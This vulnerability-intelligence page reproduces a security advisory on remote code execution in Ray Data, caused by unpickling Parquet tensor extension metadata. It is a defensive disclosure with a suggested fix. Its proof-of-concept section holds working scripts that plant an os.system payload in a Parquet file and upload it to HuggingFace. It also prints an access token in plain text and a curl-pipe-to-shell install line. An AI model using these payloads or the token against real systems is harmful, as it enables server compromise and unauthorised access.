Severity by source
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
5DescriptionGitHub Advisory
Remote Code Execution via Parquet Arrow Extension Type Deserialization
Summary
Ray Data registers custom Arrow extension types (ray.data.arrow_tensor, ray.data.arrow_tensor_v2, ray.data.arrow_variable_shaped_tensor) globally in PyArrow. When PyArrow reads a Parquet file containing one of these extension types, it calls __arrow_ext_deserialize__ on the field's metadata bytes. Ray's implementation passes these bytes directly to cloudpickle.loads(), achieving arbitrary code execution during schema parsing, before any row data is read.
In May 2024, Ray fixed a related vulnerability in PyExtensionType-based extension types (issue #41314, PR #45084). In July 2025, PR #54831 introduced cloudpickle.loads() into the replacement extension types' deserialization path, reintroducing the same class of vulnerability.
Note: Source links in this report are pinned to the Ray 2.54.0 release commit (48bd1f8fa4) for stable line references. We also re-verified the same vulnerable code paths on current master as of March 17, 2026.
Details
Extension type registration
Ray Data registers three Arrow extension types globally in PyArrow:
# python/ray/data/_internal/tensor_extensions/arrow.py:1603-1605
pa.register_extension_type(ArrowTensorType((0,), pa.int64()))
pa.register_extension_type(ArrowTensorTypeV2((0,), pa.int64()))
pa.register_extension_type(ArrowVariableShapedTensorType(pa.int64(), 0))Registration happens at module load time (__init__.py:94-95), and any use of ray.data triggers it. Once registered, PyArrow automatically calls __arrow_ext_deserialize__ whenever it encounters these extension type names in any Parquet file's schema, including files from untrusted sources.
The code path to cloudpickle.loads()
All three extension types inherit from ArrowExtensionSerializeDeserializeCache, whose __arrow_ext_deserialize__ method (arrow.py:176-179) delegates to subclass methods that ultimately call _deserialize_with_fallback():
# python/ray/data/_internal/tensor_extensions/arrow.py:84-96
def _deserialize_with_fallback(serialized: bytes, field_name: str = "data"):
"""Deserialize data with cloudpickle first, fallback to JSON."""
try:
# Try cloudpickle first (new format)
return cloudpickle.loads(serialized)
# <-- arbitrary code execution
except Exception:
# Fallback to JSON format (legacy)
try:
return json.loads(serialized)
except json.JSONDecodeError:
raise ValueError(
f"Unable to deserialize {field_name} from {type(serialized)}"
)The serialized bytes come directly from the Parquet file's field-level metadata (ARROW:extension:metadata) with no validation. cloudpickle.loads() is tried first, meaning a crafted payload will always be executed before the safe JSON fallback is reached.
For ArrowTensorType, the call chain is:
__arrow_ext_deserialize__(cls, storage_type, serialized)
# arrow.py:176
-> _arrow_ext_deserialize_cache(serialized, value_type)
# arrow.py:178
-> _arrow_ext_deserialize_compute(serialized, value_type)
# arrow.py:652
-> _deserialize_with_fallback(serialized, "shape")
# arrow.py:653
-> cloudpickle.loads(serialized)
# arrow.py:88 RCEArrowTensorTypeV2 (arrow.py:679-680) and ArrowVariableShapedTensorType (arrow.py:1076-1077) follow the same pattern.
Why the existing mitigation doesn't help
After issue #41314, Ray added check_for_legacy_tensor_type() in parquet_datasource.py:146-170 to block the old PyExtensionType-based tensor types:
# python/ray/data/_internal/datasource/parquet_datasource.py:146-170
def check_for_legacy_tensor_type(schema):
"""Check for the legacy tensor extension type and raise an error if found.
Ray Data uses an extension type to represent tensors in Arrow tables. Previously,
the extension type extended `PyExtensionType`. However, this base type can expose
users to arbitrary code execution. To prevent this, we don't load the type by
default.
"""
for name, type in zip(schema.names, schema.types):
if isinstance(type, pa.UnknownExtensionType) and isinstance(
type, pa.PyExtensionType
):
raise RuntimeError(...)This guard checks for PyExtensionType / UnknownExtensionType. It does not check for the currently-registered ray.data.arrow_tensor types, which are the ones that call cloudpickle.loads(). Additionally, the check runs after PyArrow has already deserialized the schema, so even if it checked for the current types, the code execution would have already occurred.
Outside Ray's documented threat model
Ray's security documentation states that Ray relies on network isolation and "extensively uses cloudpickle." This vulnerability does not require cluster access. The payload arrives through a Parquet file from cloud storage, a data lake, HuggingFace, or a shared filesystem. A perfectly firewalled Ray cluster is vulnerable if it reads a crafted file.
Impact
- Affected versions: Ray 2.49.0 through 2.54.0 (latest release as of March 2026). The vulnerable
_deserialize_with_fallbackfunction withcloudpickle.loads()was introduced in commitf6d21db1a4(PR #54831, July 2025), first released in Ray 2.49.0. - Affected configurations: Any process that uses Ray Data and reads Parquet files. The extension types are registered globally in PyArrow, so all Parquet reads in the process are affected, including
ray.data.read_parquet(),pyarrow.parquet.read_table(),pandas.read_parquet(), etc. - Attacker prerequisites: The attacker must place a crafted Parquet file where a Ray Data pipeline reads it. No authentication or cluster access is required. The Parquet file must contain a column with a
ray.data.arrow_tensor(or v2, or variable-shaped) extension type name, which makes this a targeted attack against Ray Data users. - CIA impact: Arbitrary command execution as the Ray worker process user, resulting in full server compromise.
- Severity: Critical
Attack scenarios
- HuggingFace datasets: Ray's documentation recommends reading Parquet datasets from HuggingFace using
ray.data.read_parquet("hf://datasets/...", filesystem=HfFileSystem()). Anyone can create a HuggingFace dataset containing a crafted Parquet file. A tensor column withray.data.arrow_tensormetadata is normal for an ML dataset, as tensor columns are a core Ray Data feature. We verified this scenario end-to-end with a private HuggingFace dataset (see PoC below). - Multi-tenant ML platforms: Organizations running shared Ray clusters where multiple teams submit data processing jobs. If one team can write Parquet files to shared storage that another team reads, the writer can execute arbitrary code in the reader's context.
- Compromised data pipelines: An upstream data producer writes Parquet files with crafted tensor column metadata. The payload survives because standard Parquet tools preserve extension metadata transparently.
PoC
We provide two reproductions: a minimal local PoC and a full end-to-end scenario via HuggingFace.
Prerequisites: Python 3.12+ and uv (curl -LsSf https://astral.sh/uv/install.sh | sh).
PoC 1: Local file
Creates a valid Parquet file with a tensor column whose extension metadata contains a crafted cloudpickle payload. Reading the file with Ray Data triggers code execution during schema parsing.
1. Create the Parquet file:
cat > craft_parquet.py << 'SCRIPT'
import cloudpickle
import pyarrow as pa
import pyarrow.parquet as pq
COMMAND = "id > /tmp/ray-tensor-rce-proof"
class Trigger:
def __reduce__(self):
return (eval, (f"(__import__('os').system({COMMAND!r}), (1,))[1]",))
storage_type = pa.list_(pa.int64())
schema = pa.schema([
pa.field("tensor", storage_type, metadata={
b"ARROW:extension:name": b"ray.data.arrow_tensor",
b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()),
}),
pa.field("id", pa.int64()),
pa.field("text", pa.string()),
])
table = pa.Table.from_arrays([
pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type),
pa.array([1, 2]),
pa.array(["hello", "world"]),
], schema=schema)
pq.write_table(table, "crafted.parquet")
print("Created crafted.parquet")
SCRIPT
uv run --with 'cloudpickle,pyarrow' python craft_parquet.py2. Read it with Ray Data:
rm -f /tmp/ray-tensor-rce-proof
uv run --with 'ray[data]' python -c "
import ray.data
ray.data.read_parquet('crafted.parquet')
"
cat /tmp/ray-tensor-rce-proof
# Expected: output of 'id' - confirms code executionPoC 2: End-to-end via HuggingFace
This demonstrates the realistic attack scenario: a crafted Parquet file hosted as a HuggingFace dataset, read by a Ray cluster following Ray's own documentation.
We uploaded a crafted Parquet file to a private HuggingFace dataset at antiproof/parquet-tensor-disclosure. The file looks like a normal ML dataset with tensor, id, and text columns. The read-only token below gives access.
Upload script (for reference, this is how we seeded the dataset):
cat > upload_dataset.py << 'SCRIPT'
# /// script
# requires-python = ">=3.10"
# dependencies = ["cloudpickle", "pyarrow", "huggingface_hub"]
# ///
"""Upload a crafted Parquet file to a HuggingFace dataset.
Prerequisites: huggingface-cli login (with a write token)
Usage: uv run upload_dataset.py <repo_id> <command>
"""
import sys, tempfile
from pathlib import Path
import cloudpickle, pyarrow as pa, pyarrow.parquet as pq
from huggingface_hub import HfApi
def build_parquet(output, command):
class Trigger:
def __reduce__(self):
return (eval, (f"(__import__('os').system({command!r}), (1,))[1]",))
storage_type = pa.list_(pa.int64())
schema = pa.schema([
pa.field("tensor", storage_type, metadata={
b"ARROW:extension:name": b"ray.data.arrow_tensor",
b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()),
}),
pa.field("id", pa.int64()),
pa.field("text", pa.string()),
])
table = pa.Table.from_arrays([
pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type),
pa.array([1, 2]),
pa.array(["hello", "world"]),
], schema=schema)
pq.write_table(table, str(output))
repo_id, command = sys.argv[1], sys.argv[2]
with tempfile.TemporaryDirectory() as tmpdir:
parquet = Path(tmpdir) / "train.parquet"
build_parquet(parquet, command)
HfApi().upload_file(
path_or_fileobj=str(parquet),
path_in_repo="data/train.parquet",
repo_id=repo_id, repo_type="dataset",
)
print(f"Uploaded to https://huggingface.co/datasets/{repo_id}")
SCRIPT
# We ran:
# uv run upload_dataset.py antiproof/parquet-tensor-disclosure 'id > /tmp/ray-tensor-rce-proof'Reproduce (reads the dataset from HuggingFace, no local files needed):
rm -f /tmp/ray-tensor-rce-proof
HF_TOKEN=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 \
uv run --with 'ray[data],huggingface_hub' python -c "
import ray.data
from huggingface_hub import HfFileSystem
ray.data.read_parquet(
'hf://datasets/antiproof/parquet-tensor-disclosure/data/train.parquet',
filesystem=HfFileSystem(),
)
"
cat /tmp/ray-tensor-rce-proof
# Expected: output of 'id' - confirms code execution via HuggingFace datasetThe token above is read-only. The dataset is private to prevent unintended exposure.
Suggested fix
The extension metadata stores simple values (a shape tuple like (3, 224, 224) or an ndim integer). These do not require cloudpickle.
- Replace
cloudpickle.loads()in_deserialize_with_fallback()withjson.loads(). The tensor shape and ndim are JSON-serializable. For backward compatibility with files written using the current cloudpickle format, gatecloudpickle.loads()behind an opt-in environment variable (following the pattern already established withRAY_DATA_AUTOLOAD_PYEXTENSIONTYPE). - Serialize new extension type metadata as JSON by default.
json.dumps([3, 224, 224])carries the same information ascloudpickle.dumps((3, 224, 224)), without the code execution risk. - Add a security note to
read_parquet()documentation explaining that Parquet files from untrusted sources can execute arbitrary code when tensor extension types are registered.
Please contact security@antiproof.ai with any questions about this disclosure policy or related security research.
AnalysisAI
Remote code execution in Ray Data 2.49.0-2.54.0 allows attackers to execute arbitrary Python code by crafting malicious Parquet files containing Ray tensor extension types. When Ray Data reads these files, it deserializes untrusted metadata using cloudpickle.loads() without validation, triggering code execution during schema parsing before any data is read. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Victim must use Ray Data versions 2.49.0-2.54.0 AND read a Parquet file from an attacker-controlled or attacker-influenced source. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | This vulnerability presents critical real-world risk despite absence of CVSS vector and EPSS score. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker creates a HuggingFace dataset containing a seemingly-legitimate ML training dataset with tensor, id, and text columns saved as Parquet. The tensor column uses Ray's arrow_tensor extension type with malicious cloudpickle payload in the extension metadata field. … |
| Remediation | Upgrade to Ray version 2.55.0 or later once available-vendor advisory GHSA-mw35-8rx3-xf9r confirms a patch is in development but released patched version not independently confirmed at time of analysis. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Identify all systems running Ray Data 2.49.0-2.54.0 using pip show ray and inventory which versions are in production or development. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
More from same product – last 7 days
Authentication bypass in StarTree mcp-pinot versions 3.0.1 and earlier exposes the Model Context Protocol HTTP server on
Unauthenticated remote code execution in IBM Langflow OSS versions 1.0.0 through 1.9.3 allows attackers to fully comprom
Cross-user flow execution in Langflow versions prior to 1.9.1 allows any authenticated API user to run another user's fl
Unauthenticated remote code execution in Crawl4AI versions <= 0.8.6 allows attackers to escape the AST-based sandbox in
InHand Networks IR912 V1.0.0.r20042 and IR915 V1.0.0.r20042 (including earlier versions) were discovered to contain a co
Share
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-28828
GHSA-mw35-8rx3-xf9r